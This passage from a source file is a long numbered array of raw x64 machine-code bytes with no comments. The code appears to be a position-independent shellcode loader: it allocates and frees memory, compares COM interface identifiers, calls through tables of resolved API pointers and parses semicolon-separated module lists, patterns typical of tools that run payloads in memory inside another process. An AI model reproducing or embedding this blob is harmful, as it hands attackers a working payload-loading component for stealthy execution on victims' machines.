235 0x00, 0x80, 0xc3, 0xc7, 0x02, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc3,
236 0x48, 0x83, 0xec, 0x48, 0x48, 0x8b, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00,
237 0x4c, 0x8b, 0xd9, 0x48, 0x8b, 0x49, 0x10, 0x44, 0x8b, 0xc2, 0x44, 0x0f,
238 0xb7, 0x4c, 0x24, 0x70, 0x49, 0x8b, 0xd3, 0x48, 0x89, 0x44, 0x24, 0x38,
239 0x48, 0x8b, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x11, 0x48,
240 0x89, 0x44, 0x24, 0x30, 0x48, 0x8b, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00,
241 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x44, 0x24, 0x78, 0x48, 0x89,
242 0x44, 0x24, 0x20, 0x41, 0xff, 0x52, 0x58, 0x48, 0x83, 0xc4, 0x48, 0xc3,
243 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48,
244 0x81, 0xec, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48, 0x8b, 0xf9,
245 0x48, 0x8d, 0x0d, 0x31, 0x02, 0x00, 0x00, 0x48, 0x8b, 0xda, 0x48, 0x89,
246 0x08, 0x48, 0x8d, 0x0d, 0x0c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
247 0x89, 0x48, 0x08, 0x48, 0x8d, 0x0d, 0xa6, 0x02, 0x00, 0x00, 0x48, 0x8b,
248 0x02, 0x48, 0x89, 0x48, 0x10, 0x48, 0x8d, 0x0d, 0x50, 0xff, 0xff, 0xff,
249 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x18, 0x48, 0x8d, 0x0d, 0x06, 0xff,
250 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x20, 0x48, 0x8d, 0x0d,
251 0xdc, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x28, 0x48,
252 0x8d, 0x0d, 0x3a, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48,
253 0x30, 0x48, 0x8d, 0x0d, 0xb4, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
254 0x89, 0x48, 0x38, 0x48, 0x8d, 0x0d, 0x3a, 0xf5, 0xff, 0xff, 0x48, 0x8b,
255 0x02, 0x48, 0x89, 0x48, 0x40, 0x48, 0x8d, 0x0d, 0x2c, 0xf5, 0xff, 0xff,
256 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x48, 0x48, 0x8d, 0x0d, 0x1e, 0xf5,
257 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x50, 0x48, 0x8d, 0x0d,
258 0x10, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x58, 0x48,
259 0x8d, 0x0d, 0x02, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48,
260 0x60, 0x48, 0x8d, 0x0d, 0xec, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48,
261 0x89, 0x48, 0x68, 0x48, 0x8d, 0x0d, 0xe6, 0xf4, 0xff, 0xff, 0x48, 0x8b,
262 0x02, 0x48, 0x89, 0x48, 0x70, 0x48, 0x8d, 0x0d, 0xd8, 0xf4, 0xff, 0xff,
263 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x78, 0x48, 0x8d, 0x0d, 0xca, 0xf4,
264 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x80, 0x00, 0x00, 0x00,
265 0x48, 0x8d, 0x0d, 0xb9, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89,
266 0x88, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xa8, 0xf4, 0xff, 0xff,
267 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d,
268 0x0d, 0x97, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x98,
269 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x86, 0xf4, 0xff, 0xff, 0x48, 0x8b,
270 0x02, 0x48, 0x89, 0x88, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x75,
271 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xa8, 0x00, 0x00,
272 0x00, 0x48, 0x8d, 0x0d, 0x64, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
273 0x89, 0x88, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x53, 0xf4, 0xff,
274 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48,
275 0x8d, 0x0d, 0x42, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88,
276 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x55, 0x01, 0x00, 0x00, 0x48,
277 0x8b, 0x02, 0x48, 0x89, 0x88, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x02,
278 0x48, 0x8d, 0x0d, 0x1d, 0xf4, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x28, 0x00,
279 0x01, 0x00, 0x00, 0x48, 0x89, 0x88, 0xd0, 0x00, 0x00, 0x00, 0x4c, 0x8d,
280 0x87, 0xe8, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48, 0x8d, 0x0d, 0xfd,
281 0xf3, 0xff, 0xff, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x88, 0xd8, 0x00,
282 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xeb, 0xf3, 0xff, 0xff, 0x48, 0x8b, 0x02,
283 0x48, 0x89, 0x88, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xda, 0xf3,
284 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xe8, 0x00, 0x00, 0x00,
285 0x48, 0x8d, 0x44, 0x24, 0x30, 0x83, 0x62, 0x20, 0x00, 0x33, 0xc9, 0x48,
286 0x89, 0x7a, 0x28, 0x33, 0xd2, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x57,
287 0x70, 0x48, 0x8d, 0x53, 0x08, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xff, 0x97,
288 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x15, 0x48, 0x8b, 0x4b, 0x08,
289 0x4c, 0x8d, 0x43, 0x10, 0x48, 0x8d, 0x97, 0x84, 0x06, 0x00, 0x00, 0x48,
290 0x8b, 0x01, 0xff, 0x50, 0x30, 0x4c, 0x8d, 0x9c, 0x24, 0x40, 0x02, 0x00,
291 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0xe3,
292 0x5f, 0xc3, 0xcc, 0xcc, 0x4c, 0x8b, 0xc9, 0x4d, 0x85, 0xc0, 0x75, 0x06,
293 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x48, 0x8b, 0x49, 0x28, 0x48, 0x8b,
294 0x81, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x48, 0x8b,
295 0x81, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x32, 0x48,
296 0x8b, 0x81, 0x04, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x48,
297 0x8b, 0x81, 0x0c, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x19,
298 0x48, 0x8b, 0x81, 0x84, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x13,
299 0x48, 0x8b, 0x81, 0x8c, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x75,
300 0x06, 0x4d, 0x89, 0x08, 0x33, 0xc0, 0xc3, 0x49, 0x83, 0x20, 0x00, 0xb8,
301 0x02, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28,
302 0x48, 0x8b, 0x49, 0x18, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0xba, 0xfd,
303 0xff, 0xff, 0xff, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x70, 0x33, 0xc0, 0x48,
304 0x83, 0xc4, 0x28, 0xc3, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x20,
305 0xff, 0xc8, 0xc3, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x48, 0x8b, 0x41, 0x28,
306 0x8b, 0xca, 0xff, 0x50, 0x68, 0x33, 0xc0, 0x48, 0x83, 0xc4, 0x28, 0xc3,
307 0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x81, 0xec, 0xa0, 0x00, 0x00,
308 0x00, 0x48, 0x8b, 0xfa, 0x48, 0x8d, 0x99, 0x6c, 0x04, 0x00, 0x00, 0x8a,
309 0x03, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x84, 0xc0, 0x74, 0x56, 0x48,
310 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0x48, 0x2b, 0xd3, 0x3c, 0x3b,
311 0x74, 0x1b, 0x49, 0x81, 0xf8, 0x80, 0x00, 0x00, 0x00, 0x7d, 0x12, 0x88,
312 0x04, 0x11, 0x41, 0xff, 0xc1, 0x48, 0xff, 0xc1, 0x49, 0xff, 0xc0, 0x8a,
313 0x01, 0x84, 0xc0, 0x75, 0xe1, 0x4d, 0x85, 0xc0, 0x74, 0x27, 0x49, 0x63,
314 0xc9, 0x48, 0x8b, 0xd7, 0x48, 0xff, 0xc1, 0x42, 0xc6, 0x44, 0x04, 0x20,
315 0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0xca, 0x1a,
316 0x00, 0x00, 0x85, 0xc0, 0x75, 0xa5, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
317 0x02, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x48,
318 0x81, 0xc4, 0xa0, 0x00, 0x00, 0x00, 0x5f, 0xc3, 0x40, 0x53, 0x48, 0x83,
319 0xec, 0x50, 0x33, 0xdb, 0x48, 0x8b, 0xc2, 0x4c, 0x8b, 0xc9, 0x48, 0x85,
320 0xd2, 0x74, 0x37, 0x44, 0x8d, 0x43, 0x30, 0x48, 0x8b, 0xc8, 0x48, 0x8d,
321 0x54, 0x24, 0x20, 0x41, 0xff, 0x51, 0x58, 0x83, 0xf8, 0x30, 0x75, 0x22,
322 0x81, 0x7c, 0x24, 0x40, 0x00, 0x10, 0x00, 0x00, 0x75, 0x14, 0x81, 0x7c,
323 0x24, 0x48, 0x00, 0x00, 0x02, 0x00, 0x75, 0x0a, 0x83, 0x7c, 0x24, 0x44,
324 0x04, 0x75, 0x03, 0x8d, 0x58, 0xd1, 0x8b, 0xc3, 0xeb, 0x02, 0x33, 0xc0,
325 0x48, 0x83, 0xc4, 0x50, 0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
326 0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56,
327 0x41, 0x57, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x89,
328 0x40, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xff, 0x41, 0x83, 0xcc,
329 0xff, 0x4d, 0x8b, 0xf0, 0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf1, 0xbf, 0x00,
330 0x01, 0x00, 0x00, 0x4d, 0x85, 0xc9, 0x0f, 0x84, 0xba, 0x00, 0x00, 0x00,
331 0x48, 0x8d, 0x91, 0x24, 0x06, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x14, 0x06,
332 0x00, 0x00, 0x41, 0xff, 0xd1, 0x85, 0xc0, 0x78, 0x7d, 0x48, 0x8d, 0x44,
333 0x24, 0x30, 0x89, 0x7c, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0x0c, 0x48, 0x89,
334 0x44, 0x24, 0x20, 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56,
335 0x70, 0x49, 0x8b, 0x0e, 0x49, 0x8d, 0x5e, 0x08, 0x4c, 0x8d, 0x86, 0x34,
336 0x06, 0x00, 0x00, 0x4c, 0x8b, 0xcb, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48,
337 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c, 0x48, 0x8b, 0x0b,
338 0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
339 0x50, 0x50, 0x85, 0xc0, 0x78, 0x33, 0x44, 0x39, 0xbc, 0x24, 0x60, 0x02,
340 0x00, 0x00, 0x74, 0x25, 0x48, 0x8b, 0x0b, 0x4d, 0x8d, 0x4e, 0x10, 0x4c,
341 0x8d, 0x86, 0x54, 0x06, 0x00, 0x00, 0x48, 0x8d, 0x96, 0x44, 0x06, 0x00,
342 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x08, 0x4c, 0x21, 0x3b,
343 0xeb, 0x03, 0x4d, 0x21, 0x3e, 0x85, 0xc0, 0x79, 0x30, 0x49, 0x8d, 0x46,
344 0x10, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0x54, 0x06, 0x00, 0x00, 0x48, 0x89,
345 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x86, 0x44, 0x06, 0x00, 0x00, 0x33, 0xc9,
346 0xff, 0x96, 0x38, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x79, 0x0b, 0x4d, 0x21,
347 0x7e, 0x10, 0x33, 0xc0, 0xe9, 0x23, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e,
348 0x10, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x0e,
349 0x01, 0x00, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x89, 0x7c, 0x24, 0x28,
350 0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
351 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70, 0x48, 0x8d,
352 0x4c, 0x24, 0x30, 0xff, 0x96, 0xd8, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e,
353 0x10, 0x4d, 0x8d, 0x4e, 0x18, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd0, 0x48,
354 0x8b, 0xf8, 0x4c, 0x8b, 0x11, 0x41, 0xff, 0x52, 0x60, 0x48, 0x8b, 0xcf,
355 0x8b, 0xd8, 0xff, 0x96, 0xe0, 0x00, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x88,
356 0xb9, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x18, 0x48, 0x8d, 0x96, 0x64,
357 0x06, 0x00, 0x00, 0x4d, 0x8d, 0x46, 0x20, 0x48, 0x8b, 0x01, 0xff, 0x10,
358 0x85, 0xc0, 0x0f, 0x88, 0x9d, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05,
359 0x00, 0x00, 0x4c, 0x8d, 0x84, 0x24, 0x78, 0x02, 0x00, 0x00, 0x44, 0x21,
360 0xbc, 0x24, 0x7c, 0x02, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0x89,
361 0x84, 0x24, 0x78, 0x02, 0x00, 0x00, 0x8d, 0x51, 0xf0, 0xff, 0x96, 0xa8,
362 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x74, 0x6a, 0x4c,
363 0x8b, 0x40, 0x10, 0x33, 0xd2, 0x39, 0x95, 0x24, 0x05, 0x00, 0x00, 0x76,
364 0x15, 0x8a, 0x84, 0x2a, 0x28, 0x05, 0x00, 0x00, 0x42, 0x88, 0x04, 0x02,
365 0xff, 0xc2, 0x3b, 0x95, 0x24, 0x05, 0x00, 0x00, 0x72, 0xeb, 0x49, 0x8b,
366 0x4e, 0x20, 0x4d, 0x8d, 0x46, 0x28, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0x01,
367 0xff, 0x90, 0x68, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x48, 0x8b, 0x43, 0x10,
368 0x41, 0x0f, 0x94, 0xc7, 0x33, 0xd2, 0x39, 0x95, 0x24, 0x05, 0x00, 0x00,
369 0x76, 0x16, 0xc6, 0x84, 0x2a, 0x28, 0x05, 0x00, 0x00, 0x00, 0xc6, 0x04,
370 0x02, 0x00, 0xff, 0xc2, 0x3b, 0x95, 0x24, 0x05, 0x00, 0x00, 0x72, 0xea,
371 0x48, 0x8b, 0xcb, 0xff, 0x96, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xc7,
372 0x4c, 0x8d, 0x9c, 0x24, 0x30, 0x02, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x38,
373 0x49, 0x8b, 0x6b, 0x40, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x41,
374 0x5c, 0x5f, 0x5e, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x20, 0x55, 0x56, 0x57,
375 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0x90,
376 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28, 0x48, 0x8b, 0xd9, 0x48, 0x8b,
377 0x51, 0x48, 0xe8, 0x59, 0x12, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48,
378 0x8b, 0xcb, 0x48, 0x8b, 0x53, 0x50, 0x4c, 0x8b, 0xe0, 0xe8, 0x46, 0x12,
379 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93,
380 0x88, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0xf8, 0xe8, 0x30, 0x12, 0x00, 0x00,
381 0x4c, 0x8b, 0xf0, 0x4d, 0x85, 0xe4, 0x74, 0x35, 0x4d, 0x85, 0xff, 0x74,
382 0x30, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x8b, 0x13, 0xbd, 0x04, 0x00, 0x00,
383 0x00, 0x44, 0x8b, 0xcd, 0x33, 0xc9, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00,
384 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x2c, 0x83,
385 0xbb, 0x30, 0x02, 0x00, 0x00, 0x02, 0x75, 0x05, 0x33, 0xc9, 0x41, 0xff,
386 0xd6, 0x83, 0xc8, 0xff, 0x48, 0x8b, 0x9c, 0x24, 0xe8, 0x01, 0x00, 0x00,
387 0x48, 0x81, 0xc4, 0x90, 0x01, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41,
388 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0xc3, 0x44, 0x8b, 0x03, 0x48, 0x8b,
389 0xd3, 0x48, 0x8b, 0xce, 0xe8, 0x1b, 0x17, 0x00, 0x00, 0x33, 0xd2, 0x48,
390 0x8d, 0x4c, 0x24, 0x40, 0x44, 0x8d, 0x42, 0x40, 0xe8, 0x2b, 0x17, 0x00,
391 0x00, 0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x41, 0xbd, 0x01, 0x00,
392 0x00, 0x00, 0x75, 0x3b, 0x44, 0x8b, 0x0e, 0x4c, 0x8d, 0x86, 0x40, 0x02,
393 0x00, 0x00, 0x41, 0x81, 0xe9, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x56,
394 0x14, 0x48, 0x8d, 0x4e, 0x04, 0xe8, 0x46, 0x13, 0x00, 0x00, 0x48, 0x8b,
395 0x56, 0x28, 0x48, 0x8d, 0x8e, 0xf0, 0x07, 0x00, 0x00, 0xe8, 0xee, 0x11,
396 0x00, 0x00, 0x48, 0x3b, 0x86, 0xf0, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x97,
397 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x46, 0x28, 0x48, 0x8b, 0xce, 0x48, 0x8b,
398 0x56, 0x30, 0xe8, 0x5d, 0x11, 0x00, 0x00, 0x48, 0x89, 0x46, 0x30, 0x48,
399 0x85, 0xc0, 0x0f, 0x84, 0x5d, 0xff, 0xff, 0xff, 0x48, 0x8d, 0x9e, 0x44,
400 0x02, 0x00, 0x00, 0x8a, 0x03, 0x33, 0xd2, 0x84, 0xc0, 0x74, 0x40, 0x33,
401 0xc9, 0x3c, 0x3b, 0x74, 0x1b, 0x81, 0xfa, 0x04, 0x01, 0x00, 0x00, 0x73,
402 0x13, 0x41, 0x03, 0xd5, 0x88, 0x84, 0x0c, 0x80, 0x00, 0x00, 0x00, 0x8b,
403 0xca, 0x8a, 0x04, 0x1a, 0x84, 0xc0, 0x75, 0xe1, 0x85, 0xd2, 0x74, 0x1b,
404 0x8d, 0x4a, 0x01, 0xc6, 0x84, 0x14, 0x80, 0x00, 0x00, 0x00, 0x00, 0x48,
405 0x03, 0xd9, 0x48, 0x8d, 0x8c, 0x24, 0x80, 0x00, 0x00, 0x00, 0xff, 0x56,
406 0x30, 0xeb, 0xb8, 0x41, 0x8b, 0xfd, 0x44, 0x39, 0xae, 0x40, 0x02, 0x00,
407 0x00, 0x76, 0x2c, 0x4c, 0x8b, 0x46, 0x28, 0x48, 0x8b, 0xce, 0x8b, 0xdf,
408 0x48, 0x8b, 0x54, 0xde, 0x30, 0xe8, 0xe2, 0x10, 0x00, 0x00, 0x48, 0x89,
409 0x44, 0xde, 0x30, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xfe, 0x01, 0x00, 0x00,
410 0x41, 0x03, 0xfd, 0x3b, 0xbe, 0x40, 0x02, 0x00, 0x00, 0x72, 0xd4, 0x8b,
411 0x86, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x19, 0x48, 0x8b,
412 0xce, 0xe8, 0x0e, 0xf2, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xd8, 0x01,
413 0x00, 0x00, 0x48, 0x8b, 0x9e, 0x20, 0x09, 0x00, 0x00, 0xeb, 0x1d, 0x83,
414 0xf8, 0x03, 0x0f, 0x84, 0xc6, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x9e, 0x20,
415 0x09, 0x00, 0x00, 0x41, 0x3b, 0xc5, 0x74, 0x08, 0x48, 0x8b, 0x9c, 0x24,
416 0xd0, 0x01, 0x00, 0x00, 0x44, 0x39, 0xae, 0x6c, 0x05, 0x00, 0x00, 0x74,
417 0x32, 0x48, 0x8b, 0xce, 0xe8, 0x9f, 0xef, 0xff, 0xff, 0x85, 0xc0, 0x75,
418 0x0d, 0x83, 0xbe, 0x6c, 0x05, 0x00, 0x00, 0x02, 0x0f, 0x84, 0x90, 0x01,
419 0x00, 0x00, 0x48, 0x8b, 0xce, 0xe8, 0x9e, 0xf0, 0xff, 0xff, 0x85, 0xc0,
420 0x75, 0x0d, 0x83, 0xbe, 0x6c, 0x05, 0x00, 0x00, 0x02, 0x0f, 0x84, 0x77,
421 0x01, 0x00, 0x00, 0x44, 0x39, 0x6b, 0x08, 0x0f, 0x84, 0x08, 0x01, 0x00,
422 0x00, 0x8b, 0x93, 0x24, 0x05, 0x00, 0x00, 0xbf, 0x30, 0x05, 0x00, 0x00,
423 0x48, 0x03, 0xd7, 0x44, 0x8b, 0xcd, 0x33, 0xc9, 0x41, 0xb8, 0x00, 0x30,
424 0x00, 0x00, 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xe8, 0x48, 0x85, 0xc0, 0x0f,
425 0x84, 0x45, 0x01, 0x00, 0x00, 0x44, 0x8b, 0xc7, 0x48, 0x8b, 0xd3, 0x48,
426 0x8b, 0xc8, 0xe8, 0x61, 0x15, 0x00, 0x00, 0x8b, 0x43, 0x08, 0x8d, 0x48,
427 0xfd, 0x83, 0xf9, 0x02, 0x76, 0x21, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0xbe,
428 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x28, 0x05, 0x00, 0x00, 0x48, 0x8d,
429 0x8b, 0x28, 0x05, 0x00, 0x00, 0xe8, 0xbe, 0x12, 0x00, 0x00, 0xe9, 0xa3,
430 0x00, 0x00, 0x00, 0x0f, 0xb7, 0xc8, 0x4c, 0x8d, 0x84, 0x24, 0xd8, 0x01,
431 0x00, 0x00, 0x66, 0x41, 0x2b, 0xcd, 0x48, 0x8d, 0x94, 0x24, 0xd0, 0x01,
432 0x00, 0x00, 0xb8, 0x00, 0x01, 0x00, 0x00, 0x66, 0x0b, 0xc8, 0xff, 0x96,
433 0x98, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xde, 0x00, 0x00, 0x00,
434 0x8b, 0x94, 0x24, 0xd0, 0x01, 0x00, 0x00, 0x44, 0x8d, 0x48, 0x04, 0x33,
435 0xc9, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0x41, 0xff, 0xd4, 0x44, 0x8b,
436 0x83, 0x20, 0x05, 0x00, 0x00, 0x4c, 0x8d, 0x8b, 0x28, 0x05, 0x00, 0x00,
437 0x0f, 0xb7, 0x4b, 0x08, 0x48, 0x8d, 0x95, 0x28, 0x05, 0x00, 0x00, 0x48,
438 0x8b, 0xf8, 0x66, 0x41, 0x2b, 0xcd, 0xb8, 0x00, 0x01, 0x00, 0x00, 0x48,
439 0x89, 0x7c, 0x24, 0x30, 0x66, 0x0b, 0xc8, 0x48, 0x8d, 0x84, 0x24, 0xe0,
440 0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x28, 0x44, 0x89, 0x44, 0x24,
441 0x20, 0x44, 0x8b, 0x83, 0x24, 0x05, 0x00, 0x00, 0xff, 0x96, 0xa0, 0x01,
442 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x48, 0x8b,
443 0xcf, 0x8b, 0xd8, 0x41, 0xff, 0xd7, 0x85, 0xdb, 0x75, 0x68, 0x48, 0x8b,
444 0xdd, 0x8b, 0x0b, 0x8d, 0x41, 0xfd, 0x41, 0x3b, 0xc5, 0x76, 0x50, 0x8d,
445 0x41, 0xff, 0x41, 0x3b, 0xc5, 0x76, 0x15, 0x8d, 0x41, 0xfb, 0x41, 0x3b,
446 0xc5, 0x77, 0x4b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xce, 0xe8, 0x76, 0x09,
447 0x00, 0x00, 0xeb, 0x3e, 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x48, 0x8b, 0xd3,
448 0x48, 0x8b, 0xce, 0xe8, 0x3c, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10,
449 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xce, 0xe8,
450 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8b, 0xce,
451 0xe8, 0xbb, 0xf4, 0xff, 0xff, 0xeb, 0x0b, 0x48, 0x8b, 0xd3, 0x48, 0x8b,
452 0xce, 0xe8, 0xae, 0x04, 0x00, 0x00, 0x8b, 0x86, 0xe4, 0x06, 0x00, 0x00,
453 0x83, 0xe8, 0x02, 0x41, 0x3b, 0xc5, 0x77, 0x34, 0x48, 0x8b, 0x8e, 0x20,
454 0x09, 0x00, 0x00, 0x48, 0x85, 0xc9, 0x74, 0x28, 0x44, 0x8b, 0x86, 0x18,
455 0x09, 0x00, 0x00, 0x33, 0xd2, 0xe8, 0x22, 0x14, 0x00, 0x00, 0x48, 0x8b,
456 0x8e, 0x20, 0x09, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00,
457 0x00, 0x41, 0xff, 0xd7, 0x48, 0x83, 0xa6, 0x20, 0x09, 0x00, 0x00, 0x00,
458 0x44, 0x8b, 0x06, 0x33, 0xd2, 0x8b, 0x9e, 0x30, 0x02, 0x00, 0x00, 0x48,
459 0x8b, 0xce, 0xe8, 0xf5, 0x13, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00,
460 0xc0, 0x00, 0x00, 0x48, 0x8b, 0xce, 0x41, 0xff, 0xd7, 0x83, 0xfb, 0x02,
461 0x75, 0x05, 0x33, 0xc9, 0x41, 0xff, 0xd6, 0x33, 0xc0, 0xe9, 0x72, 0xfc,
